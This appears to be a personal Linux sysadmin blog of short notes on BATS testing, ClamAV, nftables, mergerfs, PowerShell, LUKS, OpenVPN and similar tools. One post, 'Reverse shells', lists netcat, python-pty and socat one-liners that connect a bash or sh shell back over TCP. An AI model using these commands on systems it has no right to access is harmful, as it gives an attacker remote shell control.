April 3, 2020 — 12:31

Author: silver  Category: dev linux  Comments: Off

Bash Automated Testing System

BATS is a framework for unit testing Bash scripts. The latest version can be found here:

Testing will make sure changes to your script do not break stuff but you wont have to do this by hand every time, instead using BATS to automate it for you.

Bats test files have the ".bats" extension, and can be run like this: bats example.bats.


There’s two extra repos you’ll also want to check out and load at the start of your tests:


An example test case might look like this:

#!/usr/bin/env bats

load 'bats-support/load'
load 'bats-assert-1/load'

@test "$(date '+%H:%M:%S') test help" {
  run -h
  [ "$status" -eq 0 ]
  assert_output --partial "USAGE:"

@test "$(date '+%H:%M:%S') test invalid argument" {
  run -invalid
  [ "$status" -eq 1 ]
  assert_output --partial 'Error: invalid or unknown arg(s)'

We’ll first display the time and some text, then test the output "" by running it.

The first case will pass if -h outputs the text "USAGE:". There can also be other text output before and after since we assert a partial match.

The second case checks what the script would output on an invalid error and compares is it to "Error: invalid or unknown arg(s)". If it’s the same, the test pass will pass.

More testing

If you need more complicated testing there’s also functions and variables. Two default functions are setup() and teardown() to set tests up.

A good way to run tests is to be able to call the functions inside your script directly, so you probably want to consider this beforehand.

Alternatively there’s also other frameworks available:

December 16, 2019 — 15:14

Author: silver  Category: linux  Comments: Off

ClamAV is a decent anti virus scanner for Linux. Unfortunately it does not run every well on low memory systems (<1GB).

Running it’s database update tool freshclam can cause OOM. You will notice this if getting daily cdiff’s keeps failing (see ‘dmesg’ and /var/log/clamdb). These are db differences only instead of full files. The problem is processing these to create whole cvd’s.

If there’s close to enough RAM you could try using cgroups (or systemd) – if thats available, or good old ulimit:

Edit /etc/cron.d/clamav-freshclam and replace whats there with:

29 */1 * * *    clamav [ -x /usr/bin/freshclam ] && { ulimit -Sm 512000; ulimit -Sv 512000; ulimit -Hm 1024000; ulimit -Hv 1024000; /usr/bin/freshclam --quiet; } > /dev/null

But what if you’re on an embedded system or small vps and there’s not even close to 1GB memory available?

Simple, just get the full cvd files instead:

29 */1 * * *     clamav { for i in bytecode.cvd daily.cvd main.cvd; do wget -N -q "$i" -O /var/lib/clamav/$i; done; }  > /dev/null

Password Managers
December 11, 2019 — 15:34

Author: silver  Category: encryption linux windows  Comments: Off

There are basically 3 different categories to choose from, depending on location of service and db: Local, "Cloud"/SaaS or selfhosted On-Premise.

For single user/home usage KeePass is fine or perhaps even the password manager included in web browsers. Using one of the SaaS options such as LastPass adds ease of access.

For company/enterprise usage sharing passwords in groups/teams should be supported and preferably an on-prem option.

December 11, 2019 — 14:32

Author: silver  Category: linux network  Comments: Off

nftables (nft) replaces iptables:

  • Debian (10 buster) links ‘iptables’ to ‘iptables-nft’ and ‘iptables-legacy’ is actually ‘iptables’
  • RH uses nft as as preferred firewall since RHEL8 and firewalld uses nft as backend

If you haven’t switched yet you might want to ‘translate’ your current iptables rules and make other programs use nft.


rules are located in:

  • Debian /etc/nftables.conf
  • RedHat /etc/sysconfig/nftables.conf


nft list ruleset

nft list chain ip filter INPUT

nft list tables nft list table ip filter


nft flush ruleset


iptables-restore-translate -f /etc/iptables/rules.v4 > /etc/iptables/ruleset.nft

ip6tables-restore-translate -f /etc/iptables/rules.v6 > /etc/iptables/ruleset6.nft


Oddly enough the only place I could find a nft plugin was here

curl -o /usr/share/netfilter-persistent/plugins.d/15-nft


Make f2b use nft. From

  • edit ‘/etc/fail2ban/jail.local.conf’: banaction = nftables-multiport

  • add to ‘/etc/nftables.conf’: include "/etc/fail2ban.conf"

  • create ‘/etc/fail2ban.conf’:

#!/usr/sbin/nft -f

# Use ip as fail2ban doesn't support ipv6 yet
table ip fail2ban {
        chain input {
                # Assign a high priority to reject as fast as possible and avoid more complex rule evaluation
                type filter hook input priority 100;

September 6, 2019 — 18:36

Author: silver  Category: linux storage  Comments: Off

Union filesystem (FUSE) like unionfs, aufs and mhddfs. Merge multiple paths and mount them, similar to concatenating.

Get it here: or from OS package repository.

Compared to (older) alternatives mergerfs seems very stable over the past months I’ve been using it. It offers multiple options on how to spread the data over the used drives.

Optionally SnapRAID can be used to add parity disk(s) to protect against disk failures (

Create/mount pool

Example using 5 devices /dev/sd[b-f]

Disks are already partitioned and have a fs

for i in {b..f}; do
  mkdir /mnt/sd${i}1
  mount /dev/sd${i}1 /mnt/sd${i}1 && \
  mkdir /mnt/sd${i}1/mfs
done && \
mkdir /mnt/mergerfs && \
mergerfs -o defaults,allow_other,use_ino /mnt/sd*/mfs /mnt/mergerfs

And here’s the result from ‘df’:

/dev/mapper/sdb1             3.6T  100M  3.5T  1% /mnt/sdb1
/dev/mapper/sdc1             3.6T  100M  3.5T  1% /mnt/sdc1
/dev/mapper/sdd1             3.6T  100M  3.5T  1% /mnt/sdd1
/dev/mapper/sde1             3.6T  100M  3.5T  1% /mnt/sde1
/dev/mapper/sdf1             3.6T  100M  3.5T  1% /mnt/sdf1
mergerfs                      18T  500M  8.5T  1% /mnt/mergerfs

Changing pool

remove old drive from mergerfs pool

xattr -w user.mergerfs.srcmounts -/mnt/data1 /mnt/pool/.mergerfs

add new drive

xattr -w user.mergerfs.srcmounts +/mnt/data4 /mnt/pool/.mergerfs

some other mount options (-o)

  • use_ino make mergerfs supply inodes
  • fsname=example-name name in df
  • no_splice_write fixes page errors in syslog

Pool info

xattr -l /mnt/mergerfs/.mergerfs


  • mergerfs.balance
  • mergerfs.consolidate
  • mergerfs.ctl
  • mergerfs.dedup
  • mergerfs.dup
  • mergerfs.fsck
  • mergerfs.mktrash


mergerfs.ctl -m /mnt/mergerfs info
mergerfs.ctl -m /mnt/mergerfs list values
mergerfs.ctl -m /mnt/mergerfs remove path /mnt/data1
mergerfs.ctl -m /mnt/mergerfs add path /mnt/data4

July 9, 2019 — 9:17

Author: silver  Category: dev linux windows  Comments: Off

I’ve been using PS for a while now and I don’t hate it anymore :) In fact I think it’s very usable for lots of tasks and automation.

Some Useful commands:

  • Get-Command *help* or Get-Command-Module PackageManagement
  • Get-Member to view properties e.g. Get-Disk | Get-Member
  • Get-Alias
  • Get-ExecutionPolicy -List
  • Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
  • piping to select, sort and where
  • Invoke-WebRequest $url

CSV, XML and JSON support is included:

  • Import-CSV Export-CSV
  • ConvertTo-XML
  • ConvertFrom-Json ConverTO-Json

And stuff like:

  • Logging sessions: Start-Transcript Stop-Transcript
  • Viewing Certificates: cd Cert:\ (now you can ‘dir’ etc)
  • Run as admin: powershell.exe -Command "Start-Process cmd -Verb RunAs"
  • PS Linting:

Remote usage is also possible over WinRM (or OpenSSH):

  • Enter-PSSession -ComputerName <host>

Then there’s Loops, Params, Arrays and Hash Tables e.g. foreach, Param([string]$arg), @() and @{}

More info:

Cgroups and NS
May 30, 2019 — 21:18

Author: silver  Category: linux  Comments: Off

Linux Control Groups and Namespaces

Used for limiting and isolation



  • lsns
  • nsenter
  • cgroup-tools pkg (cgget, cgset, …)


  • ip netns list
  • ip netns identify <pid>
  • ip netns exec <netns> ip
  • or: ip -n|-netns


  • ps axwww -o cgroup
  • ps axwww -o cgroup,user,pid,%cpu,%mem,vsz,rss,tname,stat,start,time,comm
  • ps axwww -o ipcns,mntns,netns,pidns,userns,utsns,pid,comm


  • /proc/<pid>/ns
  • /sys/fs/cgroup


Vim linting
May 30, 2019 — 20:50

Author: silver  Category: dev linux  Comments: Off

Linting is basically making sure source code is correct.

For Vim there’s ALE: Asynchronous Lint Engine. It supports multiple tools like cpplint for C/C++, ShellCheck for shell scripts, phan for PHP etc etc.


Get it here:


  • ALELint
  • ALEEnable
  • ALEDisable
  • ALENext
  • ALEPrevious


To use Ctrl+j and Ctrl+k to moving between errors:

nmap <silent> <C-k> <Plug>(ale_previous_wrap)
nmap <silent> <C-j> <Plug>(ale_next_wrap)
December 8, 2018 — 17:52

Author: silver  Category: linux  Comments: Off

Zonemaster is an Open source DNS validation tool


Install Perl modules


cpanm File::ShareDir cpanm File::Slurp Hash::Merge IO::Socket::INET6 List::MoreUtils Mail::RFC822::Address Module::Find Moose Net::IP Readonly::XS Text::CSV Devel::CheckLib

Zonemaster LDNS and Engine:

cpanm Zonemaster::LDNS
cpanm Zonemaster::Engine


time perl -MZonemaster::Engine -e &#039;print map {&quot;$_\n&quot;} Zonemaster::Engine-&gt;test_module(&quot;BASIC&quot;, &quot;;)&#039;

Install Perl modules


cpanm MooseX::Getopt Text::Reflow Module::Install

Zonemaster CLI:

cpanm Zonemaster::CLI


zonemaster-cli --test basic
zonemaster-cli --no-ipv6 --show_level --show_module --progress --level INFO --test Syntax
GNU find
March 30, 2018 — 14:51

Author: silver  Category: linux windows  Comments: Off

Just a few useful ‘find’ examples


find . -path ./foo -prune -o -name bar
find /home \( -path /usr/data -prune -o -path /usr/src \) -prune -o -name foo -print
find . -name Makefile -not -path foo
find . -type d ! -regex .*\/\(foo\|bar\).* \;


find . -perm -775
find . -perm /u+w,g+
find . -printf "%m:%f\n"
find . -printf "%m %h/%f\n"|grep -v '^\(644\|755\)'

Print date:

find -type f -printf '%TF %.8TT %p\n'


find.exe . -name *.exe -exec certutil -hashfile {} SHA512 ; >c:\hash.txt

Updating CPU Microcode
March 28, 2018 — 12:50

Author: silver  Category: linux windows  Comments: Off


Tool from Intel called “BIOS Implementation Test Suite” that can do several things including handling microcode:


  • load/update microcode using pkg:
  • load/update intel microcode manually:
    – get latest tgz from intel: see below
    – backup/copy files: /lib/firmware/intel-ucode
    – check kernel config: grep MICROCODE /boot/config-*
    – run iucode_tool:
    /usr/sbin/iucode_tool -tb -lS /lib/firmware/intel-ucode/*
    – update initramfs: update-initramfs -u -k all
  • reloading microcode:
    echo 1 > /sys/devices/system/cpu/microcode/reload
    or: rmmod cpuid; modprobe cpuid
  • show version:
    dmesg | grep microcode or: grep microcode /proc/cpuinfo
  • skip loading microde on boot:
    add to grub cmdline: dis_ucode_ldr


Microsoft includes certain microcode updates in Windows CPU’s. For example: KB4090007, KB3064209, KB2970215.

Get Microcode

Download the latest version from Intel:

Magic SysRq Key
November 25, 2017 — 22:19

Author: silver  Category: linux  Comments: Off

How to use SysRq (Print Screen key)

( “REISUB” )


echo 1 > proc/sys/kernel/sysrq




When logged in using SSH the SysRq may be accessible by writing to /proc/sysrq-trigger
echo s > /proc/sysrq-trigger

useful options:

  • b: Immediately reboot the system, without unmounting or syncing filesystems
    echo b > proc/sysrq-trigger
  • e: Send the SIGTERM signal to all processes except init (PID 1)
  • f: Call oom_kill, which kills a process to alleviate an OOM condition:
  • s: Sync all mounted filesystems:
  • t: Output a list of current tasks and their information to the console:
  • u: Remount all mounted filesystems in read-only mode
  • w: Display list of blocked (D state) tasks
  • space: Print a summary of available magic SysRq keys

November 25, 2017 — 18:04

Author: silver  Category: linux web  Comments: Off

GoAccess is a “real-time web log analyzer” which can output in CLI or HTML (like webalizer, awstats and piwik etc). It works out of the box with Apache, for lighttpd you probably need to specify the log format. Examples below are for lighttpd. Run “goaccess /var/log/httpd/access.log” without any other arguments and it will ask for the log format and drop you into the Dashboard (text based gui).


no conf, just arguments:

goaccess /var/log/lighttpd/access.log \
--date-format=%d/%b/%Y \
--time-format='%T %z' \
--log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"'


change /etc/goaccess.conf:

date-format %d/%b/%Y:%T %z
log-format %h %v %e [%d] "%r" %s %b "%R" "%u"


Output to “static” html file.

current log:

goaccess /var/log/lighttpd/access.log \
  --date-format=%d/%b/%Y \
  --time-format='%T %z' \
  --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \

use all logs:

zcat -f /var/log/lighttpd/access.log*gz | goaccess \
  --date-format=%d/%b/%Y \
  --time-format='%T %z' \
  --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
  --ignore-crawlers \
  --with-output-resolver \
  -e -e ::1 -e


The last option is to run it as Server using WebSocket. This allows it to:

  • output realtime HTML: --real-time-html
  • run as daemon: --daemonize
  • use FIFO: --fifo-in= --fifo-out=
  • use HTTPS: --ssl-cert= --ssl-key= --ws-url=wss://url

live log:

goaccess /var/log/lighttpd/access.log \
 --date-format=%d/%b/%Y \
 --time-format='%T %z' \
 --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
 --output=/var/www/html/goaccess.html \
 --real-time-html \
 --ssl-cert=//etc/ssl/certs/cert.pem \
 --ssl-key=/etc/ssl/private/privkey.pem --ws-url=wss://

Now should should a live Dashboard (tcp port 7890 needs to be open for client).

August 23, 2017 — 16:45

Author: silver  Category: linux  Comments: Off

perf – performance analysis tools for Linux

Start with:

perf top
perf bench all


To find out why “kworker” process (kernel per-cpu threads) has high CPU usage:

  • record 10 seconds of backtraces on all CPUs to
    perf record -g -a sleep 10
  • analyse recording:
    perf report

More info:

August 23, 2017 — 15:37

Author: silver  Category: linux  Comments: Off

Remote upgrade using aptitude:

  1. echo “defscrollback 10000” >>/root/.screenrc
  2. screen
  3. /etc/sysctl.conf:
    # on kernel panic reboot after 60s
    kernel.panic = 600
    # enable magic sysrq key
  4. In /etc/apt/sources.list: change old to new dist (or “stable” etc)
    ( if needed: apt-get install debian-archive-keyring )
  5. aptitude update
  6. aptitude safe-upgrade
    ( optionally/if needed: full-upgrade, dist-upgrade )

Change default editor:

sudo update-alternatives --config editor

Install build tools:

apt-get install build-essential

pkg install dates:

for file_list in `ls -rt /var/lib/dpkg/info/*.list`; do \
  stat_result=$(stat --format=%y "$file_list"); \
  printf "%-50s %s\n" $(basename $file_list .list) "$stat_result"; \


apt-get -t stretch-backports install “package”
aptitude -t stretch-backports install “package”


Package: *
Pin: release a=stable
Pin-Priority: 900

Package: *
Pin: release o=Debian
Pin-Priority: -10

“testing” packages:

install a pkg from testing:
sudo apt-get -t testing install tmux
show all testing pkgs:
aptitude search -F "%p %V %v" '?narrow(~i, ~Atesting)
( stable, unstable, oldstable, etc )

apt-get install package=version

March 4, 2017 — 16:01

Author: silver  Category: linux  Comments: Off

When trying to ping as non root user you might get the following error:

ping: icmp open socket: Operation not permitted

There are several ways to fix this:

reinstall pkg (debian):

$ sudo apt-get install --reinstall iputils-ping

(sets cap)

manually set cap:

$ sudo setcap cap_net_raw+ep /bin/ping
$ sudo setcap cap_net_raw+ep /bin/ping6
$ sudo getcap /bin/ping
$ sudo getcap /bin/ping6

needs kernel config:

dont use SOCK_RAW:


$ cat /proc/sys/net/ipv4/ping_group_range
$ sysctl net.ipv4.ping_group_range
  • “1 0” default, nobody except root
  • “100 100” single group
  • “0 2147483647” everyone (max gid)
$ sysctl net.ipv4.ping_group_range = "0 2147483647"

net.ipv4.ping_group_range=0 2147483647


chmod +s /usr/ping
chmod +s /usr/ping6
Linux Audit
March 4, 2017 — 15:43

Author: silver  Category: linux  Comments: Off

First make sure “auditd” is started

add rules:

auditctl -a always,exit -S all -F path=/etc/passwd -F key=config1
auditctl -w /etc/passwd -p rwa -k config2

del rules:

auditctl -d always,exit -S all -F path=/etc/passwd -F key=config1
auditctl -W /etc/passwd -p rwa -k config2

(or restart auditd)

make permanent:

add rules to /etc/audit/rules.d/audit.rules

show results:

ausearch -ts today -k config1
aureport -k

disable audit logs:

systemctl mask systemd-journald-audit.socket
HP ProLiant
December 9, 2016 — 21:54

Author: silver  Category: linux other  Comments: Off


  • BIOS: F10
  • HP SSA Smart Storage Administrator / ACU Array Configuration Utility: F5
  • ORCA / Options ROM for Configuring Arrays: Press any key…, F8
  • HP IP: F10
  • Boot Menu: F11

Install HP software:


sh spp -d redhat -r 6.7 -n
sh spp -d redhat -r 6.7
sh spp -d redhat -r 5.10 -n
sh spp -d redhat -r 5.10
sed -i 's/gpgcheck=0/gpgcheck=1/' /etc/yum.repos.d/HP-spp.repo
rpm --import
rpm --import
rpm --import
for i in $( rpm -qa gpg-pubkey* ); do rpm -qi $i |grep -B 8 Hewlett; done
yum install hpacucli
yum install hponcfg

HP Server Management Application and Agents Command Line Interface

# hpasmcli -s "clear iml"

HP Lights-Out Online Configuration Utility for Linux

hponcfg -f Clear_EventLog.xml -i


 <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
 <RIB_INFO MODE="write">


  <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
  <SERVER_INFO MODE="write">


<ribcl VERSION="2.0">
 <login USER_LOGIN="Administrator" PASSWORD="boguspassword">
  <user_INFO MODE="write">
   <mod_USER USER_LOGIN="Administrator">
    <password value="NewPass123"/>
November 26, 2016 — 17:52

Author: silver  Category: linux  Comments: Off


gnome-keyring-daemon -r -d

If doesn’t suffice this extra steps might help:

pgrep -f gnome-keyring-daemon
rm -rf ~/.cache/keyring-*
setsid /usr/bin/gnome-keyring-daemon /dev/null 2>&1
ln -s ~/.cache/keyring-* $GNOME_KEYRING_CONTROLA
/usr/bin/gnome-keyring-daemon --start --components=pkcs11
/usr/bin/gnome-keyring-daemon --start --components=gpg
/usr/bin/gnome-keyring-daemon --start --components=ssh
find ~/.cache/ -maxdepth 1 -type l -name 'keyring-*' -delete
sendmail with attachment
November 26, 2016 — 17:48

Author: silver  Category: linux  Comments: Off

Oneliner to send email with attachment using sendmail:

$S Subject
$B Body
$A Attachment

Display man pages as text
November 26, 2016 — 15:51

Author: silver  Category: linux  Comments: Off
man openssl | cat
man -P cat openssl
groff -t -e -mandoc -Tascii manpage.1 | col -bx > manpage.txt
Linux Disk Encryption
November 26, 2016 — 13:04

Author: silver  Category: encryption linux  Comments: Off

Linux Disk Encrption using Device Mapper, cryptsetup frontend and Linux Unified Key Setup LUKS (on disk format).


cryptsetup -y -v luksFormat /dev/sdb1
cryptsetup luksOpen /dev/sdb1 foo
cryptsetup status foo -v


cryptsetup --test-passphrase open /dev/sdb1 # (non-LUKS)
cryptsetup luksOpen --test-passphrase /dev/sdb1
cryptsetup isLuks /dev/sdb1 && echo IMaLUKS
cryptsetup luksDump /dev/sdb1


(asks current passphase first)

cryptsetup -y luksChangeKey <target device> -S <target key slot number>
cryptsetup -y luksChangeKey /dev/sdb1 -S 1

Or use gui gnome-disks:

  • Disks (gnome-disks)
  • 1.0TB Hard Disk
  • Volumes: “Partition 1 1.0 TB LUKS”
  • Cogs/wheels

Add/remove key:

sudo cryptsetup -y luksAddKey ENCRYPTED_PARTITION
sudo cryptsetup luksRemoveKey ENCRYPTED_PARTITION


dmsetup ls --tree
lsblk --fs
Reverse shells
November 26, 2016 — 12:45

Author: silver  Category: linux  Comments: Off



netcat -lvp 9999


netcat -e /bin/sh 9999


python -c 'import pty; pty.spawn("/bin/bash")'
( sleep 1; echo 'bla' ) | python -c "import pty; pty.spawn(['/usr/bin/sudo','-S','whoami']);"





socat file:`tty`,raw,echo=0 tcp-listen:8888


socat exec:'bash -li',pty,stderr,setsid,sigint,sane


socat exec:"bash -li",pty,stderr,setsid,sigint,sane
socat TCP-LISTEN:8888,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
socat FILE:`tty`,raw,echo=0 TCP:
export STY=
stty rows 40 cols 130
stty rows 40 cols 230
November 25, 2016 — 22:02

Author: silver  Category: encryption linux  Comments: Off

Install on CentOS6:

Required packages:

yum install -y fuse-2.8.3-5.el6.x86_64 
yum install -y fuse-libs.x86_64
yum install -y fuse-devel.x86_64
usermod -a -G fuse <your_user>
yum install -y git
yum install -y cmake
yum install -y boost-serialization.x86_64
yum install -y openssl-devel.x86_64
yum install -y rlog-devel.x86_64
yum install -y tinyxml2-devel.x86_64 
yum install -y gettext-devel.x86_64
yum install -y centos-release-scl
yum install -y devtoolset-3-gcc-c++ -y


scl enable devtoolset-3 bash
git clone
cd encfs
mkdir build
cd build
cmake ..
make test
make install
make package
mkdir ~/test
mkdir ~/Private


encfs ~/Private ~/test
echo testing > ~/test/testfile
fusermount -u ~/test
November 25, 2016 — 21:31

Author: silver  Category: encryption linux  Comments: Off

OpenVPN Access Server is quite easy and fast to setup and includes a web gui.



Clickety click in the gui, plus some hardening:



auth SHA512
cipher AES-256-CBC

Connect with SSH + SOCKS Proxy + OTP:

$ ssh -D 1 to remote host

Ban user:

Ban a user from logging into the VPN or Web server
(doesn’t affect a user who is already logged in — for this, use DisconnectUser below):

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value true UserPropPut

Re-admit a user who was previously banned:

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value false UserPropPut

Disconnect a user:

/usr/local/openvpn_as/scripts//sacli --user <USER> --key prop_deny --value true UserPropPut

Set client cert keysize:

/usr/local/openvpn_as/scripts/sa --keysize=4096 Init

Generating init scripts:

/usr/local/openvpn_as/scripts/openvpnas_gen_init [--auto]

Google Authenticator:

Unlock a secret:

./sacli -u <USER> --lock 0 GoogleAuthLock

Lock a secret:

./sacli -u <USER> --lock 1 GoogleAuthLock

Generate a new, unlocked secret:

./sacli -u <USER> --lock 0 GoogleAuthRegen

Generate a new, locked secret:

./sacli -u <USER> --lock 1 GoogleAuthRegen

Enable Google Authenticator for all accounts:

./sacli --key vpn.server.google_auth.enable --value true ConfigPut

Enable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value true UserPropPut


./sacli --key vpn.server.google_auth.enable --value false ConfigPut

Disable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value false UserPropPut

Revoke and reissue secret:

./sacli -u <USER> GoogleAuthRegen

Retrieve current user properties:

./confdba -us -p

Port sharing:

Advanced VPN Settings: port-share 10443
(tcp mode only)

We use Matomo free and open source web analytics (opt-out)